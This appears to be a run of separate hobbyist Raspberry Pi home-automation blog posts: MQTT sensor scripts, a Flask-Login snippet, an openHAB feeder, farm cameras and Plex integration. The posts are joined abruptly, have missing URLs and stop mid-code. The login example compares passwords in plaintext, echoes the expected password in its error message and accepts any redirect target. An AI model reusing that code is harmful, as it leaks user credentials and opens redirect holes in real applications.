#6 Let's run a simple Python program on the Pi B+ to check that we are able to send data to the MQTT broker on the Pi 3. Here is a sample Python program; change the hostname
value to the Hub Pi 3's IP address, and make sure the topic values match the values we entered in the configuration.yaml file above.

import paho.mqtt.publish as publish
import time

print("Sending EnOcean Magnetic Contact value")
publish.single("home/door", "ON", hostname="192.168.0.24")
time.sleep(5)
print("Sending EnOcean Temperature value")
publish.single("home/temperature", "28", hostname="192.168.0.24")
print("Sending EnOcean Magnetic Contact value")
publish.single("home/door", "OFF", hostname="192.168.0.24")
time.sleep(5)
print("Sending EnOcean Magnetic Contact value")
publish.single("home/door", "ON", hostname="192.168.0.24")
time.sleep(5)
print("Sending EnOcean Temperature value")
publish.single("home/temperature", "26", hostname="192.168.0.24")

Now when you run the program above, you should see the sensor values for EnOcean Temperature and Door update on the Home Assistant dashboard.

#7 Run the program that sends values from the EnOcean sensor on the Pi B+ to the Pi 3:

import telnetlib
import paho.mqtt.publish as publish
import time

# Connection details for the fhem server installed on the same Pi
# For the telnet details check out URL -
HOST = "127.0.0.1"
PORT = 7072
tell = telnetlib.Telnet()
# Connecting to the fhem server
tell.open(HOST, PORT)
# Ask the fhem server to start streaming events
tell.write("inform on\n")

def string_after(s, delim):
    return s.partition(delim)[2]

while True:
    # Read up to the next newline
    output = tell.read_until("\n")
    # Check the value of the Magnetic Contact Transmitter module - door open/close
    if "contact" in output:
        print output
        if "closed" in output:
            print "Magnetic contact closed"
            print("Sending EnOcean Magnetic Contact value - ON")
            # Send the door open/close value to the topic; change the IP address to the IP of the Pi running the broker
            publish.single("home/door", "ON", hostname="192.168.0.24")
        else:
            print("Sending EnOcean Magnetic Contact value - OFF")
            publish.single("home/door", "OFF", hostname="192.168.0.24")
    # Checking the temperature sensor
    # If you get the error "No EEP profile identifier and no Manufacturer ID", wait for the sensor to charge
    if "sensor" in output:
        print output
        delim = "temperature:"
        print string_after(output, delim)
        print("Sending EnOcean Temperature value")
        publish.single("home/temperature", string_after(output, delim), hostname="192.168.0.24")

Once you're done with testing, set the program up in the crontab to run continuously. In the screenshot above, the left-hand side is the terminal running the program above on the Pi B+ connected to the EnOcean module, and the right is Home Assistant installed on the Pi 3, aka the Hub.

There are many different individuals that will need access to the HangarControl system. Pilots may be at home, at their office, or on the road. With that in mind, I wanted to create a single web interface that would accommodate a variety of browsers, including desktop, tablets, and smartphones. To ease the pain of coding HTML for all of the different platforms, I chose to use jQuery Mobile () for the front-end toolset. Don't let anyone fool you -- there is still quite a learning curve when using "the easiest way to build sites and apps that are accessible on all popular smartphone, tablet and desktop devices!" That quote is from the jQuery Mobile website. I referred to it often, the quote that is, when I needed to convince myself that front-end coding could be even more difficult. Enough of that, let's move on to the structure. There are many hangars and aircraft that we need to be able to preheat. Once the system is installed, I did not want to have to return each time there was a change to the configuration. The "auto discovery" capabilities in xPL provide for this. Each node (Raspberry Pi + heater relay) is flashed with the same image. A node broadcasts its presence and then waits for messages. The web interface of HangarControl provides the Administrator with a link to configure each node. Note the "Unconfigured Hangar" below.
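The broadcast-and-wait discovery flow just described could look roughly like the sketch below. This is not the actual HangarControl node code; the `hangar-node` source name and the field values are assumptions for illustration (xPL heartbeats are plain-text UDP broadcasts on port 3865).

```python
# Hypothetical sketch of a node announcing itself with an xPL-style heartbeat.
# The "hangar-node" identifier is made up for illustration.
import socket

XPL_PORT = 3865  # standard xPL UDP port

def hbeat_message(instance, interval=5):
    """Assemble a minimal xpl-stat heartbeat body for one node."""
    return ("xpl-stat\n{\nhop=1\nsource=hangar-node.%s\ntarget=*\n}\n"
            "hbeat.app\n{\ninterval=%d\nport=%d\n}\n"
            % (instance, interval, XPL_PORT))

def broadcast_heartbeat(instance):
    # UDP broadcast, so the hub can discover nodes without any configuration.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.sendto(hbeat_message(instance).encode("ascii"),
                ("255.255.255.255", XPL_PORT))
    sock.close()

# On a node: broadcast_heartbeat("49568296")
```

An unconfigured node would then keep appearing under its raw instance ID, as in the screenshot, until the Administrator names it.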
Clicking on the "49568296" link brings us to a page where the Administrator can name the hangar and airplane. Here is where we can specify how long the heater runs, as well as the Raspberry Pi GPIO pin for controlling the heater relay. In Episode #6 ([Pi IoT] Hangar Central #6, Minimal Web Application), I introduced the web application framework Flask (Welcome | Flask (A Python Microframework)), which I am using to provide the application environment for HangarControl. Flask provides a number of optional modules that you may use to supplement your project. One of these is Flask-Login, which I am using to aid in session management. Take a look at Episode #8 ([Pi IoT] HangarControl #8.1 -- What's a database? The Movie or [Pi IoT] HangarControl #8, Database? What's a Database?) for a behind-the-scenes look at integrating with Flask-Login. Since authentication is such an important component of any public-facing application, I will show you what you need to write if you plan on using Flask-Login yourself. The main module is named hangarcontrol.py; a boilerplate can be found in Episode #6 ([Pi IoT] Hangar Central #6, Minimal Web Application). To that minimal file, Flask-Login needs to be included.

# Include Flask-Login, the session & user management module
from flask_login import LoginManager, login_required, login_user, logout_user
# The User class with necessary Flask-Login & search methods
from lib.user import User

# Instantiate flask-login, send our application context, and register a login page
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'

# The URL for logging in.
# A user gets directed here automatically
# when they select their first page which has been tagged with @login_required
@app.route('/login', methods=['GET', 'POST'])
def login():
    error = None
    next = request.args.get('next')
    if request.method == 'POST':
        user = User.find_by_username(request.form['username'])
        log.info("login: user=%s", user)
        if user == None:
            error = 'Invalid username'
        elif request.form['password'] != getattr(user, 'password'):
            error = 'Invalid password got=%s, expected=%s' % (request.form['password'], getattr(user, 'password'))
        else:
            login_user(user, remember=True)
            flash('You were logged in')
            # next_is_valid should check if the user has valid
            # permission to access the `next` url
            if not next_is_valid(next):
                return abort(400)
            return redirect(next or url_for('hangars'))
    return render_template('login.html', error=error)

# When redirected for login, the URL has a parameter ('next') which
# indicates the page to navigate to after a successful login.
def next_is_valid(next):
    return True

# Flask-Login needs a method to do user lookups. The user_id is passed from
# the login page and we use our "finder" class methods to do a lookup
# on our User class.
@login_manager.user_loader
def load_user(user_id):
    return User.find_by_username(user_id)

# Produce a list of hangars. Require a valid login before presenting the page.
@app.route('/hangars')
@login_required
def hangars():
    hangars = server.getHangarList()
    return render_template('hangars.html', hangars=hangars)

At this point we have a completely functional system and pilots are able to request (automated) preheating service. Next up, I'd like to include the SMS and telephone interfaces. Let's see if I have enough time to write it up! Rick

This post is about a mini project that I suddenly thought of during the challenge and thought would fit well as part of the larger project. The idea was to make a key holder allowing up to four different (sets of) keys.
It serves two purposes: a fixed place to hang our keys (we tend to misplace them a lot!) and, assuming proper use, an alternative/additional presence check. For the key holders, I decided to use stereo jacks and panel mount connectors. By shorting the left and right channel in the jack, a loop is created. On the connector, the left channel connects to ground and the right channel connects to a GPIO pin with an internal pull-up resistor. When the jack is not inserted the GPIO is HIGH; when inserted, LOW. There is no differentiator per key at the moment, but this could be achieved in a future version in different ways. To have everything removable/replaceable, I used male header pins on the connectors and Dupont wires. The ground wire is daisy-chained across all four connectors. This results in a total of five connections to the Raspberry Pi's GPIO header: four GPIO pins and one ground. As a visual aid and indication, every connector is associated with an LED of a certain colour. When the jack is plugged in, the LED is turned off; when removed, turned on. The LEDs are located on a small board called Blinkt!, which fits straight onto the GPIO header. Using the Python library, the individual LEDs can be controlled. Finally, to turn this key holder into an IoT device, whenever a jack is inserted or removed, an MQTT message is published to the control unit, which can then visualise the status in OpenHAB. From there, rules can be associated with these events. What if the shed was opened while the key was still in place? Enjoy the gallery illustrating the build process and final result, just after a quick explanation of the code! The code is straightforward, and using the GPIOZero library for the first time made it even simpler! Basically, the four GPIO pins are checked in an infinite loop. Depending on the state, the matching LED is set or cleared, and an MQTT message is sent.
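The loop described above can be sketched with GPIOZero, Blinkt!, and paho-mqtt as below. This is a sketch only, not the author's code: the pin numbers, LED colours, `keyholder/slotN` topic names, and broker address are all my assumptions. The decision logic is kept in a pure function so it can be exercised without a Pi attached.

```python
# Hypothetical sketch of the key-holder loop (pins, colours, topics and
# broker address are assumptions, not from the original post).
import time

# One entry per key hook: BCM pin, Blinkt! LED index, (R, G, B) colour.
SLOTS = [
    {"pin": 5,  "led": 0, "colour": (255, 0, 0)},
    {"pin": 6,  "led": 1, "colour": (0, 255, 0)},
    {"pin": 13, "led": 2, "colour": (0, 0, 255)},
    {"pin": 19, "led": 3, "colour": (255, 255, 0)},
]

def slot_update(slot_id, inserted, previous):
    """Pure decision logic: given the new jack state and the previous one,
    return (led_on, mqtt_message) where mqtt_message is None if unchanged."""
    led_on = not inserted  # LED lit only while the key is away
    if inserted == previous:
        return led_on, None
    payload = "PRESENT" if inserted else "ABSENT"
    return led_on, ("keyholder/slot%d" % slot_id, payload)

def main():
    # Hardware-dependent imports kept inside main() so slot_update()
    # stays testable off the Pi.
    from gpiozero import Button
    import blinkt
    import paho.mqtt.publish as publish

    buttons = [Button(s["pin"], pull_up=True) for s in SLOTS]
    previous = [None] * len(SLOTS)
    while True:
        for i, (slot, btn) in enumerate(zip(SLOTS, buttons)):
            inserted = btn.is_pressed  # jack shorts the pin to ground
            led_on, msg = slot_update(i, inserted, previous[i])
            r, g, b = slot["colour"] if led_on else (0, 0, 0)
            blinkt.set_pixel(slot["led"], r, g, b)
            if msg is not None:
                topic, payload = msg
                publish.single(topic, payload, hostname="192.168.1.2")
            previous[i] = inserted
        blinkt.show()
        time.sleep(0.2)

# On the Pi: main()
```

Keeping the state comparison separate from the hardware calls also means only real insert/remove transitions generate MQTT traffic, rather than one message per polling pass.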
I just realized that the cutoff time for submission is 11:59 PM GMT, which is a bit sooner than I expected, so here is what I have thus far. After getting the connections completed with the Pi Rack, I moved on to the automation application of the feeder system I have been working on. This has included implementing Mosquitto, Paho, and MQTT for communication between OpenHAB and the feeder system. With this, I can adjust the timer and settings locally on the feeder system as well as change the timer, run the feeder manually, view the Pi CAM remotely, and be notified when there is motion in the stall. Thus far in the config, I have 3 topics that get updated at various intervals and events:
feeder/timer - used to notify topic subscribers that an update to the timer has been performed. This can be accomplished locally via the Pi Face Control and Display interface or remotely from OpenHAB.
feeder/manual - used to trigger the feeder system to run in manual mode, bypassing any timer settings.
feeder/motion - used to notify that there is movement in the stall, via a PIR sensor connected to the Pi Face Digital 2.
Within OpenHAB, to handle the user input for setting the feeder timer remotely, the following config was implemented. The site was very helpful in getting the timer section completed: The initial interface for the OpenHAB config displays the Feeder Timer, an option to set the timer, the Stall CAM (both video and still cam options), the iLumi BLE lights, and the EnOcean energy harvesting switches. From the Stall Timer, the user can set the timer by setting the Set_Timer switch to on. This will grab the timer that is set from the OpenHAB interface and send it to the feeder/timer topic, which is picked up by the feeder system. Also, the user can run the feeder manually from the interface. And, if there is motion, the Stall Motion indicator will be lit.
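The three feeder topics above can be exercised from any machine that can reach the broker with a short paho-mqtt sketch. The broker address matches the one in the config listings, and the `timer_payload` helper mirrors the "Day HH:MM AM/PM" string the feeder code splits on whitespace; treat the helper itself and the exact payloads as assumptions for illustration.

```python
# Sketch only: helpers for publishing to the three feeder topics.
def timer_payload(day, hour, minute, ampm):
    """Build the 'Day HH:MM AM/PM' string the feeder splits on whitespace."""
    return "%s %02d:%02d %s" % (day, hour, minute, ampm)

def publish_feeder(topic, payload, broker="192.168.2.130"):
    # Imported here so timer_payload() stays usable without paho installed.
    import paho.mqtt.publish as publish
    publish.single(topic, payload, hostname=broker, retain=True)

# Example calls (run where the broker is reachable):
# publish_feeder("feeder/timer", timer_payload("Mon", 7, 30, "AM"))
# publish_feeder("feeder/manual", "Run")
# publish_feeder("feeder/motion", "Motion Detected")
```

Publishing with `retain=True` means a subscriber that connects later (the feeder after a reboot, for instance) still receives the last timer setting.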
From the interface, the user selects the time (hour/min) and the day to run the timer and, once selected, clicks the Set Timer switch.

sitemap home label="Smart Stall" {
    Frame label="Stall Timer" {
        Frame label="Feeder Timer" {
            Text label="Timer [%s]" item=timerMessage icon="clock" {
                Frame label="Run Mode" {
                    Switch item=Set_Timer label="Set Timer"
                    Switch item=Manual_Run label="Manual Run"
                    Switch item=Motion_Alert label="Stall Motion"
                    Text item=Motion_Detect
                }
                Frame label="Time" {
                    Setpoint item=Set_Hour minValue=0 maxValue=23 step=1
                    Setpoint item=Set_Minute minValue=0 maxValue=55 step=5
                }
                Frame label="Days" {
                    Switch item=timerMonday
                    Switch item=timerTuesday
                    Switch item=timerWednesday
                    Switch item=timerThursday
                    Switch item=timerFriday
                    Switch item=timerSaturday
                    Switch item=timerSunday
                }
            }
        }
    }
}

Group iLumi
Group Feeder
Group DaysOfWeek
String Feeder_Timer "Get Timer [%s]" <clock> (Feeder, iLumi) { mqtt=">[jiot2:feeder/timer:command:*:default]" }
Switch Manual_Run <switch> (Feeder, iLumi)
String Run_Manual "[%s]" (Feeder, iLumi) { mqtt=">[jiot2:feeder/manual:command:*:default]" }
Number Set_Hour "Hour [%d]" <clock> (Feeder, iLumi)
Number Set_Minute "Minute [%d]" <clock> (Feeder, iLumi)
Dimmer Set_Day "Day [%s %%]" (Feeder, iLumi)
String New_Day "Day [%s]" (Feeder, iLumi)
String New_Hour "Hour [%d]" (Feeder, iLumi)
String timerMessage "%s"
Switch Motion_Alert <siren> (Feeder, iLumi)
String Motion_Detect "Switch Motion[%s]" (Feeder, iLumi) { mqtt="<[jiot2:feeder/motion:state:default]" }
Switch timerMonday "Monday" <switch> (DaysOfWeek)
Switch timerTuesday "Tuesday" <switch> (DaysOfWeek)
Switch timerWednesday "Wednesday" <switch> (DaysOfWeek)
Switch timerThursday "Thursday" <switch> (DaysOfWeek)
Switch timerFriday "Friday" <switch> (DaysOfWeek)
Switch timerSaturday "Saturday" <switch> (DaysOfWeek)
Switch timerSunday "Sunday" <switch> (DaysOfWeek)

var String timerToMQTT = ""

rule "Initialization"
when
    System started
then
    postUpdate(Set_Hour, 6)
    postUpdate(Set_Minute, 15)
    postUpdate(timerMonday, ON)
    postUpdate(timerTuesday, OFF)
    postUpdate(timerWednesday, OFF)
    postUpdate(timerThursday, OFF)
    postUpdate(timerFriday, OFF)
    postUpdate(timerSaturday, OFF)
    postUpdate(timerSunday, OFF)
    postUpdate(Manual_Run, OFF)
    postUpdate(Motion_Alert, OFF)
end

rule "Set Timer"
when
    Item Set_Hour changed or Item Set_Minute changed
then
    logInfo("Set Timer", "Set Timer")
    var String msg = ""
    var String day = ""
    var String ampm = ""
    var hour = Set_Hour.state as DecimalType
    var minute = Set_Minute.state as DecimalType
    if (timerMonday.state == ON) { day = "Mon" }
    if (timerTuesday.state == ON) { day = "Tue" }
    if (timerWednesday.state == ON) { day = "Wed" }
    if (timerThursday.state == ON) { day = "Thu" }
    if (timerFriday.state == ON) { day = "Fri" }
    if (timerSaturday.state == ON) { day = "Sat" }
    if (timerSunday.state == ON) { day = "Sun" }
    if (hour < 10) { msg = "0" }
    msg = msg + Set_Hour.state.format("%d") + ":"
    if (hour >= 12) { ampm = "PM" }
    if (hour < 12) { ampm = "AM" }
    if (minute < 10) { msg = msg + "0" }
    msg = msg + Set_Minute.state.format("%d")
    msg = day + " " + msg + " " + ampm
    postUpdate(timerMessage, msg)
    timerToMQTT = msg
end

rule "Set Feed Timer"
when
    Item Set_Timer changed from OFF to ON
then
    var String feed_timer
    //feed_timer = "Mon 07:30 AM"
    sendCommand(Send_Timer, timerToMQTT)
end

rule "Manual Feeder Run"
when
    Item Manual_Run changed from OFF to ON
then
    var String set_manual = ""
    set_manual = "Run"
    sendCommand(Run_Manual, set_manual)
end

rule "Manual Feeder Stop"
when
    Item Manual_Run changed from ON to OFF
then
    var String set_manual = ""
    set_manual = "Stop"
    sendCommand(Run_Manual, set_manual)
end

rule "Motion Detected"
when
    Item Motion_Detect changed
then
    var String motion_message = ""
    logInfo("Motion Detected", "In Da Motion")
    motion_message = Motion_Detect.state.toString
    logInfo("Motion Detected", motion_message)
    if (motion_message == "Motion Detected") {
        sendCommand(Motion_Alert, ON)
    } else {
        sendCommand(Motion_Alert, OFF)
    }
end
mqtt:jiot2.url=tcp://192.168.2.130:1883
# Optional. Client id (max 23 chars) to use when connecting to the broker.
# If not provided a default one is generated.
#mqtt:<broker>.clientId=<clientId>
mqtt:jiot2.clientId=FeedMQTT
mqtt-eventbus:broker=jiot2
mqtt-eventbus:commandPublishTopic=feeder/timer/${item}/command
mqtt-eventbus:commandSubscribeTopic=feeder/timer/${item}/state
mqtt-eventbus:commandPublishTopic=feeder/manual/${item}/command
mqtt-eventbus:commandSubscribeTopic=feeder/manual/${item}/state
mqtt-eventbus:commandSubscribeTopic=feeder/motion/${item}/state

Feeder System Paho config

def send_mqtt(message_dict):
    mqttc = mqtt.Client('python_publisher')
    mqttc.connect('192.168.2.130', 1883)
    #message_json2str = json.dumps(message_dict)
    hourTemp = str(timer_dict['hour']).rjust(2, '0')
    minTemp = str(timer_dict['min']).rjust(2, '0')
    message_json2str = timer_dict['day'] + " " + hourTemp + ":" + minTemp + " " + timer_dict['ampm']
    mqttc.publish('feeder/timer', message_json2str, retain=True)
    t.sleep(2)
    mqttc.disconnect()

# The callback for when the client receives a CONNACK response from the server
def on_connect(client, userdata, rc):
    print("Connected with result code " + str(rc))
    # Subscribing in on_connect() means that if we lose the connection and
    # reconnect, subscriptions will be renewed
    client.subscribe([("feeder/timer", 0), ("feeder/manual", 0)])
    #client.subscribe("feeder/timer")
    #client.subscribe("feeder/manual")

# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
    hourTemp = ""
    minTemp = ""
    man_run = ""
    current_timer = ""
    #msg_read = ""
    msg_read = msg.payload.decode('utf-8')
    #print(msg.topic + " " + str(msg.payload))
    print(msg.topic + " " + msg_read)
    if (msg.topic == "feeder/manual"):
        man_run = msg_read
        #man_run = str(msg.payload)
        print("feeder/manual = %s" % man_run)
        if ('Run' in man_run):
            runManual()
        #client.disconnect()
    if (msg.topic == "feeder/timer"):
        timer_data = msg_read
        if os.path.isfile('timer.json'):
            with open('timer.json') as datafile:
                current_timer = json.load(datafile)
        print("New time message %s " % timer_data)
        timer_data = timer_data.split()
        print("Current Timer %s " % current_timer)
        if current_timer != timer_data:
            print("New Timer")
            with open('timer.json', 'w') as outfile:
                json.dump(timer_data, outfile)
            timer_dict['day'] = timer_data[0].strip()
            hour_min = timer_data[1].split(":")
            timer_dict['hour'] = hour_min[0]
            timer_dict['min'] = hour_min[1]
            timer_dict['ampm'] = timer_data[2]
            saveTimerData(timer_dict)
            showTimer()
        #client.disconnect()
    #hourTemp = str(timer_dict['hour']).rjust(2, '0')
    #minTemp = str(timer_dict['min']).rjust(2, '0')
    #message_json2str = timer_dict['day'] + " " + hourTemp + ":" + minTemp + " " + timer_dict['ampm']
    client.disconnect()

def getMQTTTimer():
    mqttc = mqtt.Client()
    mqttc.on_connect = on_connect
    mqttc.on_message = on_message
    mqttc.connect('192.168.2.130', 1883, 60)
    '''
    if (mqttc.connected is not False):
        mqttc.connect('192.168.2.130', 1883, 60)
        #mqttc.loop_start()
    '''
    mqttc.loop_forever(timeout=1.0, max_packets=2, retry_first_connection=False)
    mqttc.disconnect()

The sensor I used for the motion sensing is the Parallax PIR Sensor Rev B. This is connected to the Pi Face Digital 2 input 3, 5V, and ground. (NOTE: Since the Digital 2 inputs are by default pulled up to 5V, I ended up having to put a 10K resistor between GND and pin 3 to pull the pin low when the PIR sensor was on.)
import pifacedigitalio as pdio

def detectMotion():
    MOTION = 0
    NO_MOTION = 1
    pir1 = NO_MOTION
    pdio.init()
    t.sleep(1)
    while True:
        pir1 = pdio.digital_read(3, 1)
        if pir1 == MOTION:
            print("Motion Detected!")
            send_message(topic_motion, feeder_broker, "Motion Detected")
        t.sleep(1)

This was started as a process in Python so it would run in parallel in the background to the main app:

p = Process(target=getMQTTTimer)
m = Process(target=detectMotion)
p.start()
m.daemon = False
m.start()
p.join()

With all of that, this is what it looks like in the raw, nothing in a case at this point. This has been an awesome adventure and I appreciate the opportunity to use the tools given to create a project; I just wish I could have completed it in the time allotted. I'll keep working on this and hopefully get something that is complete by year's end. Thanks, Jon

In previous blogs I had shared my issues with having the RPi B+ running MotionEyeOs with multiple cameras and wireless networking enabled. Today I have had success getting everything outside and monitoring the farm! First off, hardwired I have had zero issues with the MotionEyeOs software. I have been able to add cameras and test everything out without any issues, other than the RPi B+ being (not surprisingly) noticeably slower to respond than the RPi 3 that I first used. But once I attempted to enable WiFi, I constantly ran into issues. Finally, after creating a brand new image, ensuring all of the WiFi credential information was correct, and running off the same AP for all of my communications, I was able to get WiFi running last night. Things were looking good. But today, when I had reassembled all of my gear and installed it outside, I was not able to connect. After verifying power and all connections, I could watch the RPi B+ boot up and the WiPi flash, but when I tried to connect to the static IP, no luck.
After pulling off the extra cameras and trying it just as a base system, and still having no luck, I decided to completely bring everything back inside and retry it there. Success! Right away I was connected again via wireless and able to see all 3 cameras. Doing a little research on others' experiences with the WiPi made it sound like some of the dongles had limited range. Very limited range. This had not been factored into my planning, since I have my AP at an outside window and pretty much all of our electronics have been successful connecting from the outside, streaming the kids' various flavors of entertainment at that moment. YouTube, Spotify, Netflix, it all was usable. Luckily I had a Realtek wireless dongle; I swapped that in for the WiPi and everything was working again. Outside! MotionEyeOs even automatically adjusted for the different card, and I was able to both ping the RPi B+ and connect to the monitoring software. Camera 1 is the baby box monitor, currently looking at the rear of the Momma Rabbit. As of today, no babies, but they are expected soon. Camera 2 is the front of the Momma Rabbit's cage; usually she is right there checking things out, but right now she is trying to figure out what that camera is doing in her box. :-) Camera 3 is the view of the Chicken Casa. Here in Camera 1 we can see Momma's ear; she had just put her eye right up to the camera, checking everything out. Here is Momma starting to get a little concerned from all of the cameras and activity. Here I tried to zoom externally on the Chicken Casa camera; hard to tell, but there is a variety of chickens and G.O.A.Ts scrambling for treats. The image is a lot easier to see on screen than it is when captured. Here is a close-up of the baby box; I put a block of wood in the corner as a focal point. I quickly shut down all of the activity around the rabbits and monitoring station to allow Momma to get used to everything.
I think I may move Camera 2 over to monitor another part of the farm and allow just Camera 1 to watch the baby box, letting her get used to everything. I really like the functionality of the cameras and will be ordering some more to see about combining cameras to get a broader range of monitoring. I used a clear snack box as a cover for the USB cameras and it functioned very well; I wanted more weatherproofing than just having the cameras under a shelter roof. Yes, I like the way the whole setup is working now and look forward to adding to and improving upon it! And as a final picture, here is a test run of the efforts of my son and I in making a larger duck pond. I wanted to see how level everything is and how long the water naturally stays in our heavy clay area. Eventually a little bridge will be added over that middle, giving the ducks more shade to work with and the kids something neat to walk across to see their ducklings. It is now time to put all the electronic components together into a nice enclosure, which I am calling the HUB, using some 3D printing with wood filament and some basic woodworking with a Dremel tool. Here is a gallery of the finished HUB. As part of the build, start off by cutting a couple of hobby wood boards as shown in the pictures below. Putting the speakers together: download and 3D print the STL files attached below, using wood filament. Here I am using wood filament to 3D print so that I can sand it and then stain it, so that it matches the wooden frame. Also 3D print a holder for the Sense HAT and the Raspberry Pi 3 using wood filament; here is the link to the wood filament I am using from digitmakers.ca. Suggested slicer settings to use for 3D printing with wood filament: Layer height - 0.2 mm Infill density - 40% Temperature - 200 C. Now, let's add a handle and the 3D printed part for the Pi Camera to the top of the Hub frame.
To hold the camera I decided to use a flexible gear tie, which means you can point the camera in any direction you want by wrapping the gear tie around the handle. For 3D printing the Pi Camera holder I am using black 1.75 mm PLA, and here are some suggested slicer settings:

Layer height - 0.3 mm
Infill density - 20%
Temperature - 205 C

I purchased the handle and the gear tie at a local hardware store, HomeDepot.ca, and also bought matching screws and nuts. Adding the Pi 3, Sense HAT and all the other components to the inside of the HUB frame. For more info on the speaker circuit and how to set up Mopidy to play music, check out the blog at Pi Control Hub: Music with Mopidy and Home Assistant.

Now, to run Home Assistant on the Pi touch screen as shown in the picture below, we will have to install Chromium. Chromium is not part of the default Raspbian packages, which means we will have to run the following commands to work around this:

wget -qO - | sudo apt-key add -
echo "deb jessie main" | sudo tee -a /etc/apt/sources.list
sudo apt-get update
sudo apt-get install chromium-browser rpi-youtube -y

Here is the link to the Raspberry Pi forum post where I found this workaround.

The Plex controls:

@IBAction func playPauseAction(_ sender: AnyObject) {
    if (playing) {
        callPlex("pause")
    } else {
        callPlex("play")
    }
}

@IBAction func stopAction(_ sender: AnyObject) {
    callPlex("stop")
}

@IBAction func backAction(_ sender: AnyObject) {
    callPlex("stepBack")
}

@IBAction func forwardAction(_ sender: AnyObject) {
    callPlex("stepForward")
}

fileprivate func callPlex(_ action: String) {
    let url = URL(string: "\(clientBaseURL)/player/playback/\(action)?type=video")!
    var request = URLRequest(url: url)
    request.setValue("21DA54C6-CAAF-463B-8B2D-E894A3DFB201", forHTTPHeaderField: "X-Plex-Target-Client-Identifier")
    let task = URLSession.shared.dataTask(with: request) { data, response, error in
        print("\(response)")
    }
    task.resume()
}

The fields of the notification:

String guid;
URI key;
String ratingKey;
String sessionKey;
State state;
String transcodeSession;
String url;
long viewOffset;

The observer on the server side:

package nl.edubits.thuis.server.plex;

@Startup
@ApplicationScoped
public class PlexObserverBean {
    @Inject
    private Controller controller;
    @Inject
    private LibraryService libraryService;
    @Inject
    MqttService mqttService;

    private PlaySessionStateNotification playSessionStateNotification;
    private MediaContainer mediaContainer;

    public void onPlayingNotification(@Observes @PlexNotification(Type.PLAYING) Notification notification) {
        if (!notification.getChildren().isEmpty()) {
            playSessionStateNotification = notification.getChildren().get(0);

            if (playSessionStateNotification.getState() == State.PLAYING) {
                controller.run(whenOn(Devices.kitchenMicrowave.off(), Devices.kitchenMicrowave));
                controller.run(whenOn(Devices.kitchenCounter.off(), Devices.kitchenCounter));
                controller.run(whenOn(Devices.kitchenMain.off(), Devices.kitchenMain));
            }

            mqttService.publishMessage("Thuis/homeTheater/state", playSessionStateNotification.getState().name());
            mqttService.publishMessage("Thuis/homeTheater/playing/viewOffset", playSessionStateNotification.getViewOffset() + "");

            if (playSessionStateNotification.getKey() != null) {
                if (mediaContainer != null && !mediaContainer.getVideos().isEmpty()
                        && playSessionStateNotification.getKey().equals(mediaContainer.getVideos().get(0).getKey())) {
                    // No need to retrieve information
                    return;
                }

                mediaContainer = libraryService.query(playSessionStateNotification.getKey());

                if (!mediaContainer.getVideos().isEmpty()) {
                    Video video = mediaContainer.getVideos().get(0);
                    mqttService.publishMessage("Thuis/homeTheater/playing/title", video.getTitle());
                    mqttService.publishMessage("Thuis/homeTheater/playing/summary", video.getSummary());
                    mqttService.publishMessage("Thuis/homeTheater/playing/art", toAbsoluteURL(video.getArt()));
                    mqttService.publishMessage("Thuis/homeTheater/playing/thumb", toAbsoluteURL(video.getThumb()));
                    mqttService.publishMessage("Thuis/homeTheater/playing/grandParentTitle", video.getGrandparentTitle());
                    mqttService.publishMessage("Thuis/homeTheater/playing/grandParentThumb", toAbsoluteURL(video.getGrandparentThumb()));
                    mqttService.publishMessage("Thuis/homeTheater/playing/duration", video.getDuration() + "");
                }
            }
        }
    }
}

On the iOS side, an extension subscribes to these messages:

extension TilesCollectionViewController: MQTTSubscriber {
    func didReceiveMessage(_ message: MQTTMessage) {
        guard let payloadString = message.payloadString else { return }

        if (message.topic == "Thuis/homeTheater/state") {
            if (payloadString == "PLAYING" && currentState != "PLAYING") {
                openNowPlaying()
                navigationItem.rightBarButtonItem = UIBarButtonItem(title: "Now Playing", style: .plain, target: self, action: #selector(OldTilesViewController.openNowPlaying))
            }
            if (payloadString == "STOPPED" && currentState != "STOPPED") {
                self.presentedViewController?.dismiss(animated: true, completion: nil)
                navigationItem.rightBarButtonItem = nil
            }
            currentState = payloadString
        }
    }

    func openNowPlaying() {
        DispatchQueue.main.async {
            self.performSegue(withIdentifier: "nowPlaying", sender: self)
        }
    }
}

And for the labels:

extension UILabel: MQTTSubscriber {
    func setMQTTTopic(_ topic: String) {
        MQTT.sharedInstance.subscribe(topic, subscriber: self)
    }

    func didReceiveMessage(_ message: MQTTMessage) {
        if let payloadString = message.payloadString {
            DispatchQueue.main.async {
                self.text = payloadString
            }
        }
    }
}

Similar extensions are made for the other elements. The result looks like this:

Following these steps we set up the Home Theater flow in our iOS app and made sure everything works smoothly. In my opinion it still needs a bit of fine-tuning, but even now it works pretty well!
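The same transition-based handling can be mirrored on any other client. Below is a rough Python sketch of the subscriber logic; the topic name comes from the post, but the PlayerUI class and its action names are hypothetical stand-ins for whatever UI you drive, and a real client would receive messages through an MQTT library such as paho-mqtt rather than direct method calls:

```python
class PlayerUI:
    """Hypothetical UI facade: records which screens were opened or dismissed."""
    def __init__(self):
        self.actions = []

    def open_now_playing(self):
        self.actions.append("open")

    def dismiss_now_playing(self):
        self.actions.append("dismiss")


class HomeTheaterSubscriber:
    """Mirrors the iOS extension: react only on state *transitions*, not repeats."""
    def __init__(self, ui):
        self.ui = ui
        self.current_state = None

    def did_receive_message(self, topic, payload):
        if topic != "Thuis/homeTheater/state":
            return
        if payload == "PLAYING" and self.current_state != "PLAYING":
            self.ui.open_now_playing()
        if payload == "STOPPED" and self.current_state != "STOPPED":
            self.ui.dismiss_now_playing()
        self.current_state = payload


ui = PlayerUI()
sub = HomeTheaterSubscriber(ui)
for state in ["PLAYING", "PLAYING", "STOPPED"]:
    sub.did_receive_message("Thuis/homeTheater/state", state)
print(ui.actions)  # the duplicate PLAYING message triggers no second action
```

The guard against repeated states matters because the server republishes the state on every Plex notification, not only on changes.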
In [Pi IoT] Thuis #11: Final implementation UI design you saw our Thuis iOS app, which has a few buttons for controlling the Home Theater. In this post we'll make sure they work well. For brevity I will describe only the main scene: it makes sure we can watch anything on the Apple TV.

Before we can use any devices in Thuis we have to define them. You might remember from [Pi IoT] Thuis #8: Core v2: A Java EE application that we have a class Devices containing static definitions. Here we will add the devices we need for the home theater system:

package nl.edubits.thuis.server.devices;

public class Devices {
